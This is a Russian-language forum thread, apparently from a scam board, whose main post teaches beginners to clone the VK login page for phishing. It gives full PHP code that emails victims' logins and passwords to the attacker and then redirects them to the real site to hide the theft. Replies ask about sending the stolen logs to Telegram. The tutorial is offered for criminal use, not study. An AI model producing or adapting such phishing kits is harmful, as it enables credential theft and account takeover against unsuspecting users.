Перейти к публикации

helikop

Делаем копию любого сайта для фишинга

Рекомендованные сообщения

Нихао, скамерсанты! Сегодня я научу вас копировать совершенно любой сайт, для фишинга. Описал все подробно, так что проблем возникнуть не должно. Статья ориентирована на новичков в таких вещах, как html и php, но даже если вы разбираетесь в теме, можете почитать, может быть, найдёте что-то новое для себя. Данные, введённые на сайте будут отправляться на наш email. Для примера будем создавать копию Для просмотра ссылки Войди или Зарегистрируйся.

Подготовительные мероприятия

Перед началом нам надо:

  • определиться с тем, какой ресурс мы копируем
  • завести новый ящик (не стоит использовать свой основной для получения данных)
  • Для просмотра ссылки Войди или Зарегистрируйся Notepad++ (опционально, но настоятельно рекомендуется). На всякий случай: Для просмотра ссылки Войди или Зарегистрируйся

Готово? Начинаем.

Скачиваем страницу входа

Тут всё просто. Заходим на целевой сайт, нажимаем Ctrl+S, создаём для нашего сайта папку там, где нам нужно, выбираем "Страница (полностью)", пишем "Для просмотра ссылки Войди или Зарегистрируйся" и жмём кнопку Сохранить.

e78be5eb-55fe-4d1b-a8e1-656f69482405.png

Сделали? Отлично. В папке, созданной вами для сайта, появятся файлы и папки. В моём случае:

c819c1b7-3ed8-4592-9889-92e0121f9b4f.png

Исправляем неправильно сохранённый сайт. Открываем index.html чтобы посмотреть, всё ли хорошо сохранилось.

У меня, например, не всё. Сохранённый мною сайт выглядит так:

5b5b158f-4dff-4b90-bd75-709e0bb6cfcc.png

В то время как оригинал - так:

36715cec-02f1-4d9e-a5ca-447613f9a11a.png

Всё хорошо, единственное отличие - картинки со смартфонами, они не сохранилась (картинки в целом, бывает, не сохраняются, это относится не только к вк). Сейчас исправим. Заходим на Для просмотра ссылки Войди или Зарегистрируйся, нажимаем Ctrl+Shift+C, любимое сочетание клавиш у всех малолетних хацкеров, для изменения кода страницы. При наведении на элементы страницы они подсвечиваются, а при нажатии справа мы видим код этого элемента. Например, при нажатии на телефон слева:

c9aeb787-78b5-434d-a5af-66a028e43ebb.png

Сверху мы видим html код, а снизу - стили, применённые к объекту.

1b874693-75d5-4faf-9aaf-4921bf1f9a5e.png

Снизу

8e6feb6b-d3ce-419c-be51-f1180680fe6a.png

Попытаемся понять, откуда же сайт берёт картинку. В коде элемента никаких ссылок на картинку нет, а вот в стилях, снизу, мы видим строку.

Попытаемся понять, откуда же сайт берёт картинку. В коде элемента никаких ссылок на картинку нет, а вот в стилях, снизу, мы видим строкуКод HTML:

background-image: url(/images/login/ru/reg_android_ru.png);

и по этой ссылочке как раз и лежит изображение с телефоном. Нажмём ПКМ, затем Open in new tab:

227eb92c-7e86-4710-86c3-1eab60e55d01.png

В новой вкладке открывается пикча. Нам необходимо получить ссылку на неё (также, как вариант, можно скачать её к себе в папку с сайтом, но в этом, я считаю, нет необходимости). Чтобы получить ссылку, как нетрудно догадаться, жмём на адресную строку нашего браузера и копируем находящееся там содержимое.

Теперь, когда ссылка в наших руках, а вернее в нашем буфере обмена, мы открываем html-код сохранённой нами страницы. Для этого жмём ПКМ на файле Для просмотра ссылки Войди или Зарегистрируйся, затем тыкаем на Edit with Notepad++ в выпадающем меню. Код открыт. Теперь нам надо найти тот участок кода, что отвечает за смартфон слева. Для этого снова Ctrl+Shift+C на странице входа и снова тыкаем на смартфон слева. Справа начинает подсвечиваться такая строка с кодом:

05b54ea3-0cf5-458a-bc93-edd81068679e.png

Нам надо найти эту же строку в скачанном сайте. Для этого делаем двойной клик по тексту, идущему после "class=", то есть мы будем искать объект с таким же классом. Копируем то, что выделилось (название класса), в моём случае "LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru". Заходим в Notepad++, жмём Ctrl+F, потом Ctrl+V, потом Enter. Повезло, совпадение всего одно, гадать не придётся:

abe79607-2e68-4015-b2b2-c31433600fe8.png

При сохранении сайта у этого элемента пропал стиль. Так вернём же его! Для этого в строке "<a class="LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru" target="_blank" href="Для просмотра ссылки Войди или ЗарегистрируйсяДля просмотра ссылки Войди или Зарегистрируйся">" перед символом ">" дописываем "style="background-image: url(Для просмотра ссылки Войди или Зарегистрируйся)"".

Было:

Код HTML:

<a class="LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru" target="_blank" href="https://play.google.com/store/apps/details?id=com.vkontakte.android">

Стало:

Код HTML:

<a class="LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru" target="_blank" href="https://play.google.com/store/apps/details?id=com.vkontakte.android" style="background-image: url(https://st.vk.com/images/login/ru/reg_android_ru.png)">

Жмём на

7ae91467-87e6-419f-a55c-b63242f4e6be.png7ae91467-87e6-419f-a55c-b63242f4e6be.png

чтобы сохранить. Теперь снова открываем index.html в браузере и видим, что теперь там есть одна из пикч с телефонами.

6ae38c25-b2c4-48d5-ac37-642bb6a0bc39.png

Теперь аналогичным образом возвращаем на своё законное (или не очень) место второй смартфон. Сама копия готова. Осталось направить данные из формы на наш email.

594ffe05-fa0d-47c9-b359-856c1d71a2d6.png

Сама копия готова. Осталось направить данные из формы на наш email.

Отправляем логин и пароль на email

Теперь ищем в коде нашу форму для входа, вот эту:

4d33cb19-79c3-419e-a9ac-92907d86c764.png

Для этого в Notepad++ жмём Ctrl+F и пишем "Телефон или email".

 

Эти серые буквы в текстовом поле, которые исчезают когда пользователь начинает что-то писать называются placeholder. Так что первое, что нашлось в коде (

fed87790-d0fe-432e-9aa8-68e747ab9e86.png

) нам не подходит. Нажимаем "Найти далее" и уже теперь мы находим нужную нам строку, а именно «

52ab7663-32fb-47c3-bbf3-7b0449757093.png

», строка и отвечает за поле ввода, которое мы видим на странице входа, вот это:

d097ce60-b744-4d72-9a0a-a08e0b794dcf.png

Из этой строки нам понадобится запомнить, чему равен аргумент name, в данном случае его значение - email. Рядом есть такая строка:

4wHXVEd.png

В ней тоже смотрим чему равен name, видим, что name="pass", запоминаем это значение.

Теперь сама отправка на email. Создадим в папке сайта файл Для просмотра ссылки Войди или Зарегистрируйся(для этого создаём .txt файл и меняем в нём расширение и название). Открываем его с помощью Notepad'a и вставляем туда этот код, меняя некоторые данные на те, что нужны вам:

Код PHP:

<?php
$message = $_POST['email'] . ':' . $_POST['pass']; //это (в кавычках) те самые значения аргумента name, которые мы запоминали. Если вы копируете какой-то другой сайт, то замените значения на свои
$message = wordwrap($message, 70, "<br>");
mail('[email protected]', 'Vk', $message, "From: [email protected]"); //первую почту ([email protected]) на свою меняйте, вторую ([email protected]) - не трогайте
?>//Да, очень устаревший способ для отправки email'а, но так будет быстрее всего. Письма сразу ищите в папке спама.

Email отправили, теперь, чтобы было не так палевно, добавим перед ?> еще одну строку, которая перенаправит жертву на адрес Для просмотра ссылки Войди или Зарегистрируйся (это уже сам вк), на котором он увидит, что неправильно ввел пароль, введёт его ещё раз, зайдёт в свой акк, поймёт, что всё норм и навсегда забудет про этот случай. Так вот, строка, которую надо добавить:

Код PHP:

header('Location: https://vk.com/login?m=1');

В итоге получилось:

Код PHP:

<?php
$message = $_POST['email'] . ':' . $_POST['pass'];
$message = wordwrap($message, 70, "<br>");
mail('[email protected]', 'Vk', $message, "From: [email protected]");
header('Location: https://vk.com/login?m=1');
?>

Сохраняем этот файл, напомню, с названием Для просмотра ссылки Войди или Зарегистрируйся в папку сайта. Вернёмся к Для просмотра ссылки Войди или Зарегистрируйся. Мы не сделали ничего, чтобы при нажатии кнопки Войти открывался именно файл login.php. Исправим это. Помните, как мы искали форму по тексту "Телефон или email"? Так вот, вернёмся к тому месту в коде. Оно выглядит так:

1e5e8d26-510f-40fa-b7ba-5d639ecbfe94.png

А синей стрелкой показана та страница, на которую перенаправляется пользователь после нажатия на кнопку "Войти". Меняем этот адрес на Для просмотра ссылки Войди или Зарегистрируйся. Вот, так-то лучше:

b695f2d0-c6cf-4b67-8096-e1a1a207a886.png

Тестируем наш сайт-копию локально

Попробуем запустить сайт локально, то есть просто дважды тыкнем на Для просмотра ссылки Войди или Зарегистрируйся. Надо понимать, что локально .php файл должным образом работать не будет, но об этом чуть позже. Пока что откроем Для просмотра ссылки Войди или Зарегистрируйся. Для теста напишем рандомные символы в поля логина и пароля:

46a6a7f6-ff8b-4346-bae1-d56da212ddc0.png

Жмём на кнопку Войти, она принимает такой вид:

e97eaf40-6d60-4c89-b398-b9617378d7fc.png

И потом, после долгой загрузки, мы видим это:

7ebc2702-1824-42ff-bf11-54089b109743.png

Не повезло не повезло. Но нас так просто не остановишь, так ведь? Снова открываем Для просмотра ссылки Войди или Зарегистрируйся в Notepad, снова жмём Ctrl+F, ну и, как вы, вероятно, догадались, пишем туда фрагмент из текста предупреждения, например "Не удаётся пройти авторизацию по". Всего одно совпадение на весь код, отлично.

099ff8c7-3bb6-4b41-917f-44188a3e3adc.png

Удалим отсюда строку {"globalWarning":"Предупреждениe","globalHttpsRequestError":"Не удаётся пройти авторизацию по защищённому соединению. Чаще всего это происходит, когда на вашем компьютере установлены неправильные текущие дата и время. Пожалуйста, проверьте настройки даты и времени в системе и перезапустите браузер."}, сохраним, снова откроем Для просмотра ссылки Войди или Зарегистрируйся, снова введём данные, снова жмякаем по кнопке Войти и теперь уже нас перенаправляет на страницу login.php. Отлично. Вместо страницы, правда, откроется сам код, а email никуда не отправится, но так и должно быть, потому что сайт сейчас всё ещё у нас на компе.

Так что продолжим.

Загружаем всё на хостинг

Для тестирования подобных штук нормальные люди создают локальный сервер, используют какие-то там апачи, вроде как, но я, так уж вышло, к нормальным не отношусь, поэтому юзаю бесплатный хостинг чтобы тестить свои шизофренические коды на php. Вы можете использовать любой хостинг, но он обязательно должен поддерживать php. После регистрации на хостинге открываем File Manager и закидываем в папку public_html наши файлы из папки с сайтом Может возникнуть проблема с кодировкой, у меня вот возникла:

f53d19e7-0249-41b9-8bc5-a329d4482581.png

Чтобы пофиксить, надо просто открыть в File Manager наш .html-файл и скопировать весь код из Notepad'a сюда. После жмём save&close, обновляем страницу и видим, что проблема исчезла:

3d834ef1-a7a1-4367-bff2-1c9f537a8507.png

На бесплатном хостинге всё тестим, а дальше сами разберётесь, куда свой сайт пихать.

Вот, в общем-то, и всё. Надеюсь, у вас всё получилось. Удачи!

Поделиться сообщением


Ссылка на сообщение

в unix есть утилита wget, выкачивает весь сайт на заданную глубину вложенности одной командой.

Поделиться сообщением


Ссылка на сообщение

Так есть же бесплатное приложение для скачки сайта и всех картинок

Поделиться сообщением


Ссылка на сообщение

Сделал всё по инструкции, выдаёт такую ошибку (405 Not Allowed) что делать?

 

Поделиться сообщением


Ссылка на сообщение
  1. Тс, можно ли сделать как-то отправку логов в тг? Ночью буду тестить, пока тема выглядит полезной 

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×
×
  • Создать...